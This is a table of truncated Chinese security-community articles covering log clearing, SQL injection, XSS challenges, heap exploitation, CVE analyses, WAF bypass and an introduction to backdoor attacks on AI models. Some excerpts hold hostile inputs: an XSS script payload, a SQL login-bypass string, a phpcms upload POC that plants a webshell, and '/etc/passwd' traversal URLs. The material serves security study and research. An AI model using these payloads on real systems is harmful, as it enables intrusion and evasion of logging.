text stringlengths 100 9.93M | category stringclasses 11
values |
|---|---|
## 0x00 前言
在渗透测试过程中,Windows日志往往会记录系统上的敏感操作,如添加用户,远程登录执行等。
对于一次完整的渗透测试,通常会选择对Windows日志进行清除和绕过,而对于防御者来说,了解常用的绕过方法也有助于更好的保护自己的系统。
所以本文将要介绍常见的Windows日志清除与绕过方法,分享经验,帮助大家。
## 0x01 简介
本文将要介绍以下内容:
Windows日志的常用清除方法
Windows日志的两种绕过方法
## 0x02 Windows日志
Windows日志包括五个类别:
>应用程序
>安全
>Setup
>系统
>转发事件
查看方式:
### 1、通过面板
位置如下:
... | 社区文章 |
**欢迎关注我的公众号《壳中之魂》**
# **环境**
使用mysql,数据库名为test,含有1表名为users,users内数据如下
# **JDBC下的SQL注入**
在JDBC下有两种方法执行SQL语句,分别是Statement和PrepareStatement,即其中,PrepareStatement为预编译
## **Statement**
SQL语句
SELECT * FROM users WHERE username = '" + username + "' AND password = '" + password + "'
当传入数据为
username = admin
password ... | 社区文章 |
# xss挑战之旅
## **level1**
url:<http://xss-ctf.xiejiahe.com/level1?name=test>
关键代码分析
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center>欢迎用户".$str."</h2>";
输入test<,可以看到没有任何过滤
通过url进行控制,常用payload
<script>alert('xss')</script> ... | 社区文章 |
作者:[Liang Chen
(@chenliang0817)](http://keenlab.tencent.com/zh/2017/08/02/CVE-2017-7047-Triple-Fetch-bug-and-vulnerability-analysis/)
昨天 Google Project Zero 的 Ian Beer 发布了 CVE-2017-7047 的漏洞细节,以及一个叫 Triple_Fetch
的漏洞利用 app,可以拿到所有 10.3.2
及以下版本的用户态Root+无沙盒权限,昨天我看了一下这个漏洞和利用的细节,总得来说整个利用思路还是非常精妙的。我决定写这篇文章,旨在尽可能地记录下
Triple_Fet... | 社区文章 |
# Largebin Attack for Glibc 2.31
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 序
最近的题目很多都用到了这种攻击方式,那么就来学习一下,利用该技术能实现向目标地址写一个大值。正好用 how2heap 的例子,并且从源码调试上来学习。
## 新增保护
新版本下新增了两个检查。
if (__glibc_unlikely (fwd->bk_nextsize->fd_nextsize != fwd))
malloc_printerr ("malloc(): largebin double linked list corrupted (n... | 社区文章 |
[TOC]
# 引言
本片作为Android逆向入门篇,只有先了解APK包的信息,才可以进一步来逆向它
# APK打包
APK打包的内容主要有: **应用模块** 也就是自己开发的用到的源代码、资源文件、aidl接口文件,还有就是 **依赖模块**
即源代码用到的第三方依赖库如:aar、jar、so文件。
从图中可以看出主要分为以下几步:
## 第一步:编译,打包
目录结构类似下面所示:
android-project/
├── AndroidManifest.xml
├── gen/
├── lib/
│ └── android-support-v4.jar
├── out/
... | 社区文章 |
# Glibc-2.23 源码分析——malloc部分下
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
终于抽出时间对glibc动态内存管理部分源码进行初略的探究,试着从源码和动调来分析free函数执行过程和一些pwn的攻击技巧,分析的不是很全面,有错误的地方望提出指正,共同进步。ps:欢迎白帽子们关注
涂鸦智能安全响应中心
* * *
## Malloc的执行流程
### 情况3:申请mmap
测试代码
#include <stdio.h>
#include <stdlib.h>
int main()
{
malloc(0x20... | 社区文章 |
**译者:知道创宇404实验室翻译组
原文链接:<https://isc.sans.edu/diary/rss/28468>**
## 引入
2018年的某个时候,一个名叫 Vidar 的信息窃取软件出现了。分析显示 Vidar 是[Arkei
恶意软件的翻版](https://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/) 。从那时起,Vidar 也启发了其他基于 arkei 的变种。今天的文章回顾了
Vidar 和另外两个变种: [Oski Stealer](https://www.cy... | 社区文章 |
# 分析BSidesSF CTF 2020中Crypto方向题目
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
在BSidesSF CTF 2020中有9道Crypto相关的题目,题目整体难度适中,在这里对这9道题目进行一下分析。
## chameleon
题目描述:
Somebody encrypted our flag and lost the key! Can you decrypt it? We’ve
included the encryption utility, it should come in handy!
Note: The file was encry... | 社区文章 |
作者:[bsmali4](http://www.codersec.net/2017/07/xssfork%E4%B8%80%E6%AC%BExss%E6%8E%A2%E6%B5%8B%E5%B7%A5%E5%85%B7/)
#### xssfork简介
xssfork 作为 sicklescan 的一个功能模块,其开发主要目的是用于检测 xss 漏洞。
传统的 xss 探测工具,一般都是采用 payload in response 的方式,即在发送一次带有 payload 的 http
请求后,通过检测响应包中 payload 的完整性来判断,这种方式缺陷,很多。
第一:不能准确地检测 dom 类 xss
第二:用类似于 req... | 社区文章 |
# Linux pwn从入门到熟练(二)
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
上回说到,如何利用程序中system函数以及bin/sh字符串来进行pwn。这里我们会介绍,如何在栈可执行而system函数以及参数没有的情况下,如何自己布置payload进行pwn。此外,还提供了一份可以参考的pwn套路,套路熟悉了,即可慢慢转化为熟悉。故此名曰:入门到熟练(二)。
## 练习题参考(利用库函数读取参数)
所谓的入门到熟练,套路还是要有的。套路有了,就可以见招拆招。我们一步一步来。
拿到题,我们需要依次查看:
1. 检查保护情况
2. 判断漏洞函数,如gets,scan... | 社区文章 |
**作者:青藤实验室**
**原文链接:<https://mp.weixin.qq.com/s/ZLSFXUoNNAFxqeiD9RpYZg>**
在 [SharePoint Rce 系列分析(一)](https://paper.seebug.org/1424/) 里我简单介绍了 SP
的沙箱机制,并且通过 CVE-2020-0974 展示了 bypass 原理:
VerifyControlOnSafeList(..., false)
这类漏洞原理简单,正则特征明显,可以借助自动化手段检测,除非找到新的 bypass 点,之后再出现同类型的漏洞概率不大。
本文介绍的是议题中的另一个漏洞: **CVE-2020-1444*... | 社区文章 |
# 如何利用.NET实现Gargoyle
##### 译文声明
本文是翻译文章,文章原作者 countercept,文章来源:countercept.com
原文地址:<https://www.countercept.com/blog/gargoyle-memory-scanning-evasion-for-net/>
译文仅供参考,具体内容表达以及含义原文为准。
## 一、前言
Gargoyle是一种内存扫描规避技术,由[Josh
Lospinoso](https://github.com/JLospinoso/gargoyle)在2017年以PoC形式公开。这种技术的主要思路是保证注入的代码大多数时间处于不可执行状态,使内存扫... | 社区文章 |
来源:http://www.ms509.com/?p=474
作者:小荷才露尖尖角@MS509Team
## 0x00 简介
XG SDK是一个流行的Android app推送SDK,有不少流行Android
app均在使用,本文分析的版本主要针对100001_work_weixin_1.0.0.apk所使用的版本。
漏洞最初在2016年4月份的时候提交给了某云网站,厂商已经确认,但由于网站持续“升级”的缘故,不太可能公开细节了。后续漏洞也已经提交给了TSRC,时至现在,相关漏洞均已经完全修复,漏洞已经不影响使用该SDK的app了,因此本文决定对相关技术细节予以分享,并补充有关该漏洞后续的一些研究。
## 0x01 漏洞分析
XG ... | 社区文章 |
## 狗子的XSS学习之旅
### 0X00 前言
以前听歌,听的是旋律
后来听歌,听的是歌词
再后来听歌,听的是故事
现在听歌,听的是自己
初闻不知曲中意,再听已是曲中人
我们都已经芳华已逝,谁的成长没有过难忘的回忆
最近很惆怅啊,弄们晓得吧,你说你喜欢辣条,我说以后你就叫我辣条吧.
### 0X01 Begin
在谷歌爸爸搜了一些xss的change,遇到一个难度一般的,获得flag的方式是带上他的
请求你的vps,flag在日志里面.
如图:
本来是想用python直接接受参数的,这样更方便一点.
比如这样:
但是Flask部署在服务器要注意个问题,要加这个`... | 社区文章 |
## Ejs简介:
EJS是一个javascript模板库,用来从json数据中生成HTML字符串
* 功能:缓存功能,能够缓存好的HTML模板;
* <% code %>用来执行javascript代码
* 安装:
$ npm install ejs
## 基础用法:
### 标签:
所有使用 `<% %>` 括起来的内容都会被编译成 Javascript,可以在模版文件中像写js一样Coding
//test.ejs
<% var a = 123 %>
<% console.log(a); %>
//test.js
var ejs = require('ejs');
... | 社区文章 |
# 从popmaster理解程序分析理论部分内容
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言:
本人水平有限,如有错误,欢迎指点
看到作者的出题思路是抽象代码树和污点分析,因为之前发了几篇程序分析理论的文章但是一直没有实践,所以拿这道题自己实践一下。
污点分析在第一篇程序设计分析理论中,我写的是语义分析,但在后面的文章中还没有正式出现。关于抽象代码树,要在后面的抽象解释才提到。
过程间分析的内容还没有发出来,可以先看这篇文章帮助理解后面的过程间分析
我们已经介绍的只是数据流分析的部分内容,所以这篇文章首先会是根据数据流分析的过程间分析编写一个遍历以入口函数为起点的所有路径的脚本... | 社区文章 |
`先知安全技术社区独家发文,如需转载,请先联系社区授权;未经授权请勿转载`
> 做好基础安全运维工作
# 1\. 为什么做日志关联分析
安全团队针对安全事件的2个主要(能力)阶段:一个是发现攻击事件,另外一个是防御正在进行的攻击。首先第一个阶段,发现攻击事件,大部分安全团队从明显的被黑特征才知道自己组织的业务被攻击,来源可能几种:
* 业务/外部通知系统不能访问或有篡改情况;
* 上级管理单位下发的安全通告;
* 兄弟部门(运维部门)通告。
无论那种情况对安全部门都是很糟糕的情况,安全人员有限,工作也杂也多,从单个安全设备上确认是否是有效的攻击事件几乎不可能,但是如果将攻击事件产生的日志以线性过程的方式收集呈现出来可以辅... | 社区文章 |
# 使用同构SQL语句逐步发现SQL注入漏洞
|
##### 译文声明
本文是翻译文章,文章原作者 Eugene Lim,文章来源:https://spaceraccoon.dev/same-same-but-different-discovering-sql-injections-incrementally-with
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
本文介绍了一种新型SQL注入漏洞扫描方式,同构SQL语句。与传统方法相比,该方法可以更加有效地对SQL注入漏洞进行扫描。
## 动机
尽管现在已经开始大规模的使用对象关系映射(ORM)框架以及预编译SQL语句了,但还是有很多应用程序存在SQL注入漏洞,甚至于因... | 社区文章 |
最近做了 ph 牛的 code-breaking,在做 picklecode 这一题时,没有搞懂那个 django 的 signed_cookies 引擎对
session 的操作,就 debug 了一下,做个总结,算是做了个代码审计吧
# 0x01 获取 session_auth_hash
* 题目 : <https://github.com/phith0n/code-breaking/tree/master/2018/picklecode>
* django 使用的 SESSION_ENGINE 为 `django.contrib.sessions.backends.signed_cookies`
* pycharm... | 社区文章 |
# 【技术分享】构建一台Python BITS服务器
|
##### 译文声明
本文是翻译文章,文章来源:safebreach.com
原文地址:<https://safebreach.com/Post/Building-a-Python-BITS-Server>
译文仅供参考,具体内容表达以及含义原文为准。
****
译者:[WisFree](http://bobao.360.cn/member/contribute?uid=2606963099)
预估稿费:120RMB
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
**
**
**写在前面的话**
除了分析新出现的安全漏洞以及漏洞利用技术之外,Saf... | 社区文章 |
# Proftpd 多个堆溢出漏洞分析
|
##### 译文声明
本文是翻译文章,文章来源:投稿
译文仅供参考,具体内容表达以及含义原文为准。
[漏洞概要]
近日Nicholas Lemoniast向Proftpd官方递交了三封邮件,前两封提及Proftpd
v1.3.5a版本存在多个堆溢出漏洞,最后一封则是修复该漏洞的补丁建议。
[漏洞详情]
代码片段1:
============================================
../proftpd-master/src/pool.c:89-116
============================================
…………………..... | 社区文章 |
# 针对美国智库、非盈利组织及公共部门的攻击事件
|
##### 译文声明
本文是翻译文章,文章原作者 microsoft,文章来源:cloudblogs.microsoft.com
原文地址:<https://cloudblogs.microsoft.com/microsoftsecure/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/>
译文仅供参考,具体内容表达以及含义原文为准。
## 一、前言
路透社最近报道了针对全球各类目标的一次黑客攻击活动。在路透社相关报道... | 社区文章 |
# Phpcms_V9任意文件上传 漏洞分析
## 漏洞分析
### poc利用代码
siteid=1&modelid=11&username=123456&password=123456&email=123456@qq.com&info[content]=<img src=http://127.0.0.1/2.txt?.php#.jpg>&dosubmit=1&protocol=
发送post请求到`http://192.168.107.138/phpcms/index.php?m=member&c=index&a=register&siteid=1`即可成功上传一个webshell
如图
根据... | 社区文章 |
**PDF 版报告下载** :[WordPress REST API
内容注入漏洞事件分析报告](http://paper.seebug.org/papers/Archive/Wordpress%20REST%20APIl%E5%86%85%E5%AE%B9%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E4%BA%8B%E4%BB%B6%E5%88%86%E6%9E%90%E6%8A%A5%E5%91%8A.pdf)
**English Version:**[WordPress REST API Content Injection Vulnerability
Incident Analysis
Repor... | 社区文章 |
# 1\. DDoS趋势的一些变化
从今年3月份起,世界上最大的DDoS攻击记录到了1.7
Tbps,是一个普通家庭带宽出口的数十万倍,几乎可以横扫互联网,作为一个生存了20年之久的古老攻击形式,我们看到了今年来DDoS攻击量成指数级攀升,不仅没有出现颓势,反而愈演愈烈。随着物联网的发展,数以亿计的IoT无辜的成为了DDoS攻击的”帮凶”,这给互联网的创业者带来了无比的创业压力,一方是如洪水般的DDoS攻击,一方是普通的网络出口带宽,今天互联网的DDoS攻击已经昭示了一个不得不令人悲观的事实,普通的企业根本不可能抵御住海量的DDoS攻击,这是一场无法单靠拼技术就能打赢的战役。
## 1.1 DDoS攻击的成本究竟有多高
美国云安全技... | 社区文章 |
# 威胁猎人黑产研究 | IPv6发展带来的反欺诈难题
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
导语:IP是互联网最基础的身份标识,也是黑灰产业发展不可或缺的底层资源支撑。如果说IPv4是一颗星球,那IPv6就是一整个宇宙,它的地址空间接近无限。本文将揭露目前黑灰产对IPv6资源的利用情况,并剖析在IPv4向IPv6升级的过程中,业务场景下的安全将面临的挑战。
## 一、黑灰产采用IPv6发起攻击的趋势不可逆转
IP并不是一个新鲜的词,对于我们普通人来说,它是设备联网之后,就会被分配的地址。但在黑灰产手里,对IP的利用几乎超出我们的想象。它凭借黑色产业的强大需求已卧居在黑暗市场多年。
和我... | 社区文章 |
## 何为AMSI
Antimalware Scan Interface(AMSI)为反恶意软件扫描接口。
微软对他产生的目的做出来描述:
> Windows 反恶意软件扫描接口 (AMSI) 是一种通用接口标准,允许您的应用程序和服务与机器上存在的任何反恶意软件产品集成。AMSI
> 为您的最终用户及其数据、应用程序和工作负载提供增强的恶意软件保护。AMSI
> 与反恶意软件供应商无关;它旨在支持当今可以集成到应用程序中的反恶意软件产品提供的最常见的恶意软件扫描和保护技术。它支持允许文件和内存或流扫描、内容源
> URL/IP 信誉检查和其他技术的调用结构。AMSI
> 还支持会话的概念,以便反恶意软件供应商可以关联不同的扫描请求... | 社区文章 |
前一段有个灵车pm2.5检测器,淘宝只要12块钱。搜了下大概是个放口袋里用蓝牙和手机连接,检测PM2.5浓度的。
搜到了前几年的新闻 -> [传送门](http://3g.donews.com/News/donews_detail/2976798.html)
然而买回来才发现,安卓客户端下载链接打不开。估计是厂子跑路了,不然怎么卖这么便宜。于是想自己日了玩玩
## 0x0 拆了玩玩
里面很简单一个主板一个PM2.5检测元件一个电池
单片机是nRF51288,一个支持蓝牙的片子
照着数据手册量了一圈发现这里是SWD调试口
从左到右依次是SWCLK,SWIO,GND,?
于是,openocd启动!
然而事情并没有这么简单...
## 0... | 社区文章 |
## 0x00. 漏洞描述
### 2017年9月14日,国家信息安全漏洞共享平台(CNVD)收录了JBOSS Application
Server反序列化命令执行漏洞(CNVD-2017-33724,对应CVE-2017-12149),远程攻击者利用漏洞可在未经任何身份验证的服务器主机上执行任意代码。漏洞细节和验证代码已公开,近期被不法分子利用出现大规模攻击尝试的可能性较大。
## 0x01. 漏洞复现
### 1). 环境准备
#### 1\. JBOSS下载地址:<http://download.jboss.org/jbossas/6.1/jboss-as-distribution-6.1.0.Final.zip>
#### ... | 社区文章 |
## 1、渗透前言
对EHR系统访问时,首先是需要一个登录的,作为企业员工,大部分系统接入了SSO,该EHR系统为了保证安全性也不例外。因此对该系统的渗透测试基础的前提是————在该系统拥有一个可登录的凭据,但是该凭据并未拥有任何权限。
如下所示,正常的企业员工登录该系统时都是没有访问权限的。
那么对该类系统对其渗透的第一步必定是打开F12观察JS,发现JS目录下仅有6个JS文件
而右击源代码查看的JS里却有几十个chun-xxxxxx.js
随便打开了一个chunk-xxxxxx.js,利用插件发现存在一些路径但是在F12里搜不到,也就意味着这么多个chunk我要一个个打开看,才能够测试得比较仔细。
如下所示:
## ... | 社区文章 |
# 盘点招招毙命的29种USB攻击方式
##### 译文声明
本文是翻译文章,文章原作者 Catalin Cimpanu,文章来源:https://www.bleepingcomputer.com
原文地址:<https://www.bleepingcomputer.com/news/security/heres-a-list-of-29-different-types-of-usb-attacks/>
译文仅供参考,具体内容表达以及含义原文为准。
> **以色列本古里安大学的研究人员发现了利用 USB 设备攻陷用户电脑的29种方法。**
研究团队根据攻击的实施方式将这29种利用方法分为了四类:(1)通过重编 USB 设备的内部微控... | 社区文章 |
# 【技术分享】使用Meterpreter和Windows代理的APT案例分析
|
##### 译文声明
本文是翻译文章,文章来源:medium.com/@br4nsh
原文地址:<https://medium.com/@br4nsh/a-meterpreter-and-windows-proxy-case-4af2b866f4a1>
译文仅供参考,具体内容表达以及含义原文为准。
****
翻译:[ **興趣使然的小胃**](http://bobao.360.cn/member/contribute?uid=2819002922)
**稿费:200RMB**
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
**... | 社区文章 |
**作者:深信服千里目安全实验室
原文链接:<https://mp.weixin.qq.com/s/5bXU__xGwKMLw7eKbyh9gQ>**
## 前言
AFL,全称“American Fuzzy Lop”,是由安全研究员Michal Zalewski开发的一款基于覆盖引导(Coverage-guided)的模糊测试工具,它通过记录输入样本的代码覆盖率(代码执行路径的覆盖情况),以此进行反馈,对输入样本进行调整以提高覆盖率,从而提升发现漏洞的可能性。AFL可以针对有源码和无源码的程序进行模糊测试,其设计思想和实现方案在模糊测试领域具有十分重要的意义。
深入分析AFL源码,对理解AFL的设计理念和其中用到的技巧有着巨大的... | 社区文章 |
# 有效测试APT防护:APT定义,处理异议,测试利用方法
|
##### 译文声明
本文是翻译文章,文章来源:360安全播报
原文地址:<https://www.virusbulletin.com/uploads/pdf/magazine/2016/vb201601-effectively-testing-APT-defences.pdf>
译文仅供参考,具体内容表达以及含义原文为准。
概述:本文讲述我们所解决的一些关于APT保护软件以及设备的挑战。我们将从客观角度讲述了,什么是APT攻击,APT攻击是如何实现的,APT测试的现状以及发展等等一系列内容。并且我们在最后,将为那些正在试图采取措施或者受到APT攻击困惑的人们提供一些简... | 社区文章 |
**作者:w2ning
本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org**
## 写在前面的废话
以下是对2022年上半年3个独立攻击事件的汇总分析, 虽然漏洞原理各不相同, 但他们都有一个共同点:
攻击者不再只依赖`FlashLoan`进行`Single-Transaction-Attack`(我自己瞎起的说法).
而是真金白银地砸出数百万美金去操纵价格,制造漏洞触发的前置环境, 最后成功完成恶意攻击.
如果2022年之前的攻击者们还只是钻研代码, 空手套白狼的穷小子.
那么非常明显的, 2022年之后的他们不仅更加专业, 而且手上弹药充足, 人均索罗... | 社区文章 |
### 前言
前一阵一直在忙着申请研究生,所以审计这一块落下了好多,今天拿出键盘都落灰了。最近在学习的时候遇到了一些瓶颈,无论是wbe挖洞还是审计都感觉自己只是懂得一些表面知识,比较肤浅,对于整个流程在脑子里面没有办法构成一张完整的图。还是看了一位师傅的代码审计学习道路,找到一些Poc据此进行分析,跟进整个流程希望通过借鉴这种学习方法可以提升自己一点。另外写文章的文笔也需要提高,其实就是思路上要理清楚,一环扣一环,把不懂的人给讲清楚,本篇文章我也会尽我所能将细枝末节的地方理清楚,讲清楚。
### 从Poc开始
从舍友推荐的[网站](https://www.exploit-db.com/exploits/46555)上看到了这个CMS... | 社区文章 |
## 一、前言
遇到一个传输过程数据被加密的网站,无法重放改包,前端也做了较为严格的限制,测试一度陷入僵局,最终从js找到突破点拿到web后台管理员权限
## 二、过程
网站前端操作逻辑由js控制,首次请求返回内容为静态资源调用,随后js向页面填充内容
传输过程对数据做了加密处理
### 2.1 敏感信息泄漏
前端逻辑由js控制,全网站请求路径及参数构造方式明文出现在js中,打开开发者工具即可看见敏感信息
通过jsfinder对调用的38个js进行匹配,发现779条url
再放入burp做存活探测,263个地址可以直接被访问到,如果后端鉴权功能不完善,则可能存在大量未授权访问
### 2.2 任意用户密码修改
泄漏地址中`/xx-p... | 社区文章 |
原文链接:[先知技术社区](https://xianzhi.aliyun.com/forum/read/349.html)
Author:Tr3jer_CongRong Blog:www.Thinkings.org Mail:Tr3jer@gmail.com
### 0x00 前言
去年到现在就一直有人希望我出一篇关于waf绕过的文章,我觉得这种老生常谈的话题也没什么可写的。很多人一遇到waf就发懵,不知如何是好,能搜到的各种姿势也是然并卵。但是积累姿势的过程也是迭代的,那么就有了此文,用来总结一些学习和培养突破waf的思想。可能总结的并不全,但目的并不是讲那些网上搜来一大把的东西,So…并不会告诉大家现有的姿势,而是突破Waf
B... | 社区文章 |
今天朋友突然告诉我,某转买手机被骗了1200块钱,心理一惊,果然不出所料,那我来试试吧。。
要来了诈骗网站地址,打开是这种:
果断收集一下信息:(由于留言骗子返还朋友钱款,暂时给他留点面子,打点马赛克)
查看端口,一猜就是宝塔面板搭建,
开着80,那就访问一下:
从官网查找客服软件的教程。发现后台路径为:/admin
直接访问果然发现:
想也没想,直接admin:123456,没想到的是进去了哈哈哈:
下一步当然是getshell,找了一圈发现直接可编辑语言配置文件:
这里使用简单的一句话还给我封了ip丫的,看了一眼竟然用云盾,这骗子还有点安全意识,那只好祭出我的哥斯拉杀器(直接带bypass
f... | 社区文章 |
一 .现象
在渗透测试过程中常有
<http://www.xxx.com/../../../../../../../etc/passwd 常有这种类型的攻击方式,但是在偶尔需要单独测试的时候使用浏览器或者curl>
命令并不能达到我们想要的效果,因为curl 还有浏览器从安全方面考虑 将这种url已经过滤了。
例如:
<http://192.168.146.13:3001/../../../../../../../../../etc/passwd>
就变成
<http://192.168.146.13:3001/etc/passwd>
比如文件遍历的漏洞确实存在
这时候使用curl命令
关键的../被截取了... | 社区文章 |
翻译文
> <https://github.com/0xInfection/Awesome-WAF>
### fuzz/爆破
* 字典
* [Seclists/Fuzzing](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing).
* [Fuzz-DB/Attack](https://github.com/fuzzdb-project/fuzzdb/tree/master/attack)
* [Other Payloads](https://github.com/foospidy/payloads)
可能会被ban ip,小心... | 社区文章 |
**原文链接:<https://blogs.juniper.net/en-us/threat-research/gitpaste-12>**
**译者:知道创宇404实验室翻译组**
### 前言
Gitpaste-12是Juniper Threat
Labs最近发现的一种新蠕虫,它使用GitHub和Pastebin来存储组件代码,并且至少提供12种不同的攻击模块。
目前,该恶意软件正在开发中,它的目标是基于Linux的x86服务器,以及基于Linux ARM和MIPS的物联网设备。
Juniper实验室于2020年10月15日检测到第一次Gitpasse-12攻击。我们已经报告了有关的Pastebin URL和git repo... | 社区文章 |
**Author:p0wd3r,dawu(知道创宇404安全实验室)**
**Data: 2016-12-13**
**更新于 12/16 :** 修正了原文中的一处错误,感谢 [@k0pwn](http://weibo.com/k0pwn)。
> 2016年12月7日,国外网站exploit-db上爆出一个关于NETGEAR
> R7000路由器的命令注入漏洞。一时间,各路人马开始忙碌起来。厂商忙于声明和修复,有些人忙于利用,而我们则在复现的过程中寻找漏洞的本质。
## 一.漏洞简介
### 1.漏洞简介
2016年12月7日,NETGEAR R7000路由器在exploit-db上被爆出存在远程命令执行漏洞,随着安全研究人员的不... | 社区文章 |
# 神秘的CVE-2016-0034-微软Silverlight的0 day漏洞
|
##### 译文声明
本文是翻译文章,文章来源:360安全播报
原文地址:<https://securelist.com/blog/research/73255/the-mysterious-case-of-cve-2016-0034-the-hunt-for-a-microsoft-silverlight-0-day/>
译文仅供参考,具体内容表达以及含义原文为准。
[**Hacking Team**](http://www.wired.com/2015/07/hacking-team-breach-shows-global-spying-fir... | 社区文章 |
# 对AI发动后门攻击
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
后门一词师傅们应该很熟悉了,后门本意是指一座建筑背面开设的门,通常比较隐蔽,为进出建筑的人提供方便和隐蔽。在安全领域,后门是指绕过安全控制而获取对程序或系统访问权的方法。后门的最主要目的就是方便以后再次秘密进入或者控制系统。方便以后再次秘密进入或者控制系统。其最大的特点在于隐蔽性,平时不用的时候因为不影响系统正常运行,所以是很难被发现的。
同样的,AI作为一个系统,其实也面临着后门攻击的风险,但是由于神经网络等方法的不可解释性,导致其比传统的后门更难检测;另一方面,由于AI已经被广泛应用于各领域,如果其受到攻击... | 社区文章 |
# 【技术分享】对Fibaro家庭中心管理设备远程命令执行漏洞的分析
|
##### 译文声明
本文是翻译文章,文章来源:forsec.nl
原文地址:<https://forsec.nl/2017/09/smart-home-remote-command-execution-rce/>
译文仅供参考,具体内容表达以及含义原文为准。
译者:[WisFree](http://bobao.360.cn/member/contribute?uid=2606963099)
预估稿费:200RMB
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
**写在前面的话**
****
在我平时的休息时间里,我比较喜欢去研究一些与... | 社区文章 |
<div style="text-align: center; box-sizing: border-box; color: rgb(51, 51,
51);" helvetica="" neue",="" helvetica,="" arial,="" "hiragino="" sans=""
gb",="" "microsoft="" yahei",="" sans-serif;="" font-size:="" 16px;=""
background-color:="" rgb(255,="" 255,="" 255);="" text-align:=""
center;"=""><span style="font-size:... | 社区文章 |
原文地址:[Exploiting Format Strings in
Windows](http://https://osandamalith.com/2018/02/01/exploiting-format-strings-in-windows/ "Exploiting Format Strings in Windows")
我想在Windows下利用格式字符串时做出一个小挑战。表面上,它要求打开一个文件。起初这可能有点混乱。在读取文件时并不会受到攻击,你可以看到我们对该程序设置的第一个参数在程序中回显了。
让我们在调试器内部进行研究。正如你所看到的,如果argc == 2,应用程序将继续执行,并且argv [1]会被传递到突出显... | 社区文章 |
**手机银行木马新变种:Faketoken.q木马软件分析**
**来源:**
**<https://securelist.com/booking-a-taxi-for-faketoken/81457/>**
Trojan-Banker.AndroidOS.Faketoken是一款手机勒索恶意软件,该恶意软件已经被被安全研究人员发现一年多的时间了。在最近一段时间,卡巴斯基实验室的安全专家们发现了Faketoken这个手机银行勒索木马的一个新变种,该勒索软件已经从一个只拦截用户使用设备的原始木马演变成了能够加密用户数据的恶意软件,而且创建该新变种恶意软件的组织还在继续升级恶意软件。截至目前,全球范围内遭受该恶意软件感染的地理区域在不断... | 社区文章 |
来源链接:[xdxd.love](http://xdxd.love/2016/10/17/unicode%E5%90%8C%E5%BD%A2%E5%AD%97%E5%BC%95%E8%B5%B7%E7%9A%84%E5%AE%89%E5%85%A8%E9%97%AE%E9%A2%98/)
作者:[xdxd](http://xdxd.love/)
## 历史上的安全漏洞
### spotify的漏洞
相关资料:
<https://labs.spotify.com/2013/06/18/creative-usernames/>
spotify的漏洞相比于github的漏洞来说是一个真正的高危漏洞,可以修改任意用户的密码。
### git... | 社区文章 |
# 【技术分享】如何不调用PowerShell.exe获得Empire agent
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
****
****
译者:[myswsun](http://bobao.360.cn/member/contribute?uid=2775084127)
预估稿费:200RMB
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
**
**
**0x00 前言**
客户端已经使用Applocker来禁用PowerShell.exe,并且我买不起Cobalt
Strike。但我又想通过一个钓鱼活动来在工作站中获得一个Empire... | 社区文章 |
# 打破基于OpenResty的WEB安全防护(CVE-2018-9230)
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 0x00 前言
OpenResty® 是一个基于 Nginx 与 Lua 的高性能 Web 平台,其内部集成了大量精良的 Lua 库、第三方模块以及大多数的依赖项。
OpenResty官网:<https://openresty.org>
漏洞编号:CVE-2018-9230
漏洞简介:OpenResty
通过ngx.req.get_uri_args、ngx.req.get_post_args函数进行uri参数获取,忽略参数溢出的情况,允许远程攻击者绕过基... | 社区文章 |
# From Dvr to See Exploit of IoT Device
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
Author:0K5y && Larryxi @ 360GearTeam
## # 0x00 前言
在万物互联的时代,IoT安全也逐渐被人们所关注。IoT设备在软件二进制方面的攻击面和传统PC端的二进制安全类似,但在架构上有所不同,如arm、mips、ppc等都会在日常的安全审计过程中有所接触。架构的不同也就反应在rop链和shellcode的构造,每一种架构下的指令集都是值得利用与玩味的。
本篇文章中主要介绍了针对某ARM IoT设备从漏洞挖掘到漏洞利用的整套思考与攻击... | 社区文章 |
### 环境搭建
搭建平台:Ubuntu 16.04
# 下载内核代码
git clone https://aosp.tuna.tsinghua.edu.cn/kernel/goldfish.git
# clone漏洞项目
git clone https://github.com/Fuzion24/AndroidKernelExploitationPlayground.git kernel_exploit_challenges
#将内核切换到3.4版本
cd goldfish
git checkout -t origin/android-goldfish-3.4
#gi... | 社区文章 |
# SSL/TLS协议详解(下)——TLS握手协议
* * *
本文翻译自:<https://www.wst.space/ssl-part-4-tls-handshake-protocol/>
* * *
在博客系列的[第2部分](https://xz.aliyun.com/t/2530)中,对证书颁发机构进行了深入的讨论.在这篇文章中,将会探索整个SSL/TLS握手过程,在此之前,先简述下最后这块内容的关键要点:
> * TLS适用于对称密钥
> * 对称密钥可以通过安全密钥交换算法共享
> * 如果请求被截获,密钥交换可能会被欺骗
> * 使用数字签名进行身份验证
> * 证书颁发机构和信任链。
>
在这篇文... | 社区文章 |
# 【技术分享】如何解密TFS的秘密变量
|
##### 译文声明
本文是翻译文章,文章来源:lowleveldesign.org
原文地址:<https://lowleveldesign.org/2017/07/04/decrypting-tfs-secret-variables/>
译文仅供参考,具体内容表达以及含义原文为准。
****
